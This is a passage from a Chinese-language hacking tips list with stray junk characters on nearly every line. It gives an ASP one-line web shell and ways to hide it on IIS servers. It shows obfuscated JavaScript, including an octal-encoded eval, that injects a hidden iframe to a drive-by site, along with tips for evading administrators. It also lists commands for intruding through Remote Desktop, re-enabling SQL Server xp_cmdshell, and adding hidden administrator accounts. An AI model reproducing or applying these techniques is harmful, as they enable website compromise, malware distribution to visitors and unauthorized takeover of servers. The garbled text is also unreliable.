9 @+ D) k1 [, s4 e c2 {执行后可以用AT命令查看新加的任务+ w+ w! t/ r5 Y2 ~
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。' N( V! I, m7 N; g. n
; {2 N5 B% ~/ D$ T53、隐藏ASP后门的两种方法7 U9 G1 _/ F4 K6 P
1、建立非标准目录:mkdir images..\
" E$ Q; u8 r& d/ ~% N& t拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp `: f, e# V" b5 k4 C
通过web访问ASP木马:http://ip/images../news.asp?action=login
; H4 f0 m/ K+ m; R- r) v如何删除非标准目录:rmdir images..\ /s$ A3 X4 T& h) M7 r6 E1 @4 y, s& ~
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:# r ~2 l O* @1 t7 \
mkdir programme.asp
0 O+ h# t$ ?5 n; N7 K; [. I% Q2 P新建1.txt文件内容:<!--#include file=”12.jpg”-->
5 m6 ^; S/ T3 @' {5 ]* A新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件( Z7 z; e, f, H9 V/ `
attrib +H +S programme.asp3 i2 a* G2 G# ]) G+ y. D1 P! w9 E
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. l" N$ A+ F# k/ B% q, |0 | n& k2 Y* W5 Y9 o" n
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" }; d( s5 A0 J+ ?9 R. y9 Y
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。5 G; u! ?6 O2 D. G2 ^
$ H. d; F4 o& H Y( `7 Q55、JS隐蔽挂马
& {* M. x* m+ B2 G& p* I" B1.9 U4 p) x' A I( v2 w' m7 b, M" Q
var tr4c3="<iframe src=ht";
* {5 y4 F/ S8 X7 C( T9 r( ]9 z* Etr4c3 = tr4c3+"tp:/";7 V. g% M; ^& q1 w8 Y1 a
tr4c3 = tr4c3+"/ww";
% i) {: f x: K7 \. D) ztr4c3 = tr4c3+"w.tr4";' C+ C5 Z: a, _
tr4c3 = tr4c3+"c3.com/inc/m";
$ d3 w" {# E% R$ V1 Q, x6 Itr4c3 = tr4c3+"m.htm style="display:none"></i";+ x7 h5 q) Y3 q6 [( N
tr4c3 =tr4c3+"frame>'";( c# L0 W& E7 f0 l
document.write(tr4c3);7 t0 [- G6 \6 d* {' e% J |
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
0 Y+ A4 d7 r3 }2 b7 ^
, ~; w8 V6 c! U/ r6 a+ N/ {2.% |9 v) g' r x7 m$ G& g7 r
转换进制,然后用EVAL执行。如) d+ ]7 r1 Q2 [( }4 I+ F& [
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
T* p& M L5 _3 ~9 E! l不过这个有点显眼。
2 d3 b+ p& O+ y8 W" O+ W$ N ~& _3.& @2 F: b( t" |; ~7 F$ [
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>'); U$ ~+ W3 K! c7 G) O- o. k
最后一点,别忘了把文件的时间也修改下。* E x9 A6 P0 Z& V6 M
: Q% e/ X0 ^: O" J
56.3389终端入侵常用DOS命令
. V% M5 J3 U! a% dtaskkill taskkill /PID 1248 /t F1 `3 P8 ~! d2 w. ^
6 x1 b! Q7 L7 [- q: x
tasklist 查进程 |4 V9 T! \3 P& S! D/ U% t d
9 p! O s5 z) {cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限5 p b" h: D* C! @1 m: E& p% }) i) P
iisreset /reboot
) D% h, B, G5 `6 _tsshutdn /reboot /delay:1 重起服务器
4 y6 }. h% c9 S7 }& h# {
$ P! k8 F) N. tlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
0 @! j2 [; n- G# F, C4 J/ x4 ]9 _5 m
# K |+ f% V* |/ v0 O% jquery user 查看当前终端用户在线情况5 K W, Y: U3 n g6 A
; V5 r1 F) D, G( C# @3 O* L
要显示有关所有会话使用的进程的信息,请键入:query process *
5 R3 F* F/ x0 D2 k, Z' D0 Z+ Y8 U/ j+ V/ q
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
( s0 a( x. i- Q" ] l$ [' {3 s q7 D* y5 N
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
' _8 U# g% b b
@, G# A9 r% z9 \9 B+ ]( a8 H要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
+ U& f) U/ }5 I3 `, a$ @1 x3 ?1 P5 `4 L" E3 W- X7 k
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
3 I0 m" {! X- c8 ]6 G( N" b, r: s3 ~. f3 v
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
/ K, U) Y; q. ^0 P8 y# ?; w6 |( w( z8 v+ S! K
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
- o, ^' Z% k5 e, a! \+ A
- D! `7 J5 z2 i" Y. U& H% F命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机! r# E9 h2 O# t) W9 y
" ~" W$ O8 r! g
56、在地址栏或按Ctrl+O,输入:
4 ~ ^! R4 q6 y3 L: {& u5 O5 {javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;/ O0 |6 m# r% G) \5 z
4 v; v& J/ [4 T9 k- |
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。/ ]" N1 X- I5 d8 S1 [6 [) o3 `
7 v% O+ P; w* W) h/ ~
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,. d+ v2 F- r0 y, H
用net localgroup administrators是可以看到管理组下,加了$的用户的。$ r% ^( S, M" i: q
8 O2 M+ E$ f5 s- z+ U" N58、 sa弱口令相关命令+ N; j7 H) D% i# ^) h
5 z1 `- ~1 \( z$ T一.更改sa口令方法:
- W+ d+ \( L* ]7 q, p用sql综合利用工具连接后,执行命令:* i( h4 K" [. t6 h- U; U" I0 V$ E
exec sp_password NULL,'20001001','sa'
8 f4 e9 e1 K. s* g4 K& Q) h(提示:慎用!)" Z! l1 g8 }' A0 K) ^7 A0 D
6 o# Z2 |# b; Z4 `6 C4 w8 O二.简单修补sa弱口令. p4 p" ?/ {% p( t, {
! e3 A+ `2 P" h5 d
方法1:查询分离器连接后执行:
& q) ~, N4 a0 d$ h, t$ }8 s7 dif exists (select * from$ y- _. Q3 ~0 u, W; b# l6 t
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
; m6 i2 M& z% d6 h2 T/ dOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
: v- J/ z7 Q% h, l9 W+ u5 r% p
# M' q. y" W: K; T& f9 S; gexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'# w* T1 {/ H$ V0 u" T, V& L# [
0 c' }+ }9 {! u/ z# _ P$ _
GO% K8 K3 ?9 j2 s) d( m. ?
+ t. i9 z; l% _4 k, A& O然后按F5键命令执行完毕* q: v% c8 g4 t- I
4 X0 |+ q- r- `8 k3 y" N+ {5 [
方法2:查询分离器连接后% M9 m$ @4 ~: F: I f0 d
第一步执行:use master
5 a' O1 ~4 T3 f3 M* h' f第二步执行:sp_dropextendedproc 'xp_cmdshell'; P3 M- l6 N$ u& ?) \- \) d" N7 q
然后按F5键命令执行完毕' n8 _. w* F6 \( U. }+ O
1 i% ?# l ] W2 ~# ?: V$ j0 A, R& L
% K. r# t' b, p% D三.常见情况恢复执行xp_cmdshell.
2 u2 D7 C* T4 C6 J* {3 h' J1 g' Y% B' [3 j. O7 o) t. i
3 K. H& y+ l8 F. D( a1 未能找到存储过程'master..xpcmdshell'.3 @& z/ {4 W" n4 v$ h
恢复方法:查询分离器连接后,
. ]2 J- q3 J% x5 c9 L1 r0 ]第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
5 r9 K3 n8 n+ }+ R, R第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 e! W8 F# r$ [
然后按F5键命令执行完毕
1 O5 Z, V6 t* }( E& q) I6 ~+ }1 C/ k5 t
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
" M& W P" _4 t: o恢复方法:查询分离器连接后,7 M1 y7 W7 t, [2 X* F; U2 K4 M% D1 B
第一步执行:sp_dropextendedproc "xp_cmdshell"
0 T3 k; ]5 C: W, {4 a第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 ^ U+ M I2 s然后按F5键命令执行完毕# G+ N2 x4 V4 P5 s h" h
" ^8 i% }4 q% d5 A* Z1 K8 e, a
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
: N# Y8 Y! `! G7 T; }1 K$ U恢复方法:查询分离器连接后,& t3 o" S6 W! T4 Z# L L6 }2 ?
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
8 o/ o5 a; w8 F. P. e第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 1 ?- h. { W' O @! h1 H1 r! [
然后按F5键命令执行完毕
; \: M1 b" e1 o8 d
: d6 g& W6 c- z$ b四.终极方法.
( G( b( m( r! k. c, m7 W1 _* B7 L如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:+ D. g& F) p0 a) G2 u0 O0 Q
查询分离器连接后,$ ?3 L. D# E/ N4 y5 v: m
2000servser系统:
$ I# K. r) j/ M9 y2 odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'. x5 ]' j8 w1 H/ R: v
. ~3 \6 t: g0 A0 m% K! L6 j$ l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- T. S! h1 e0 @4 p* R# X
: @6 x! H3 M+ x: [0 Qxp或2003server系统:
; B% _9 D7 M% j5 S! t; _+ v/ s4 U& v% u5 ^1 T$ V9 _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'6 K8 o9 ]+ n/ l8 {4 U
: s) |9 I/ L4 m9 D2 ^/ |$ G9 P+ \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
' C6 h s& Y( a. R% {! [# v |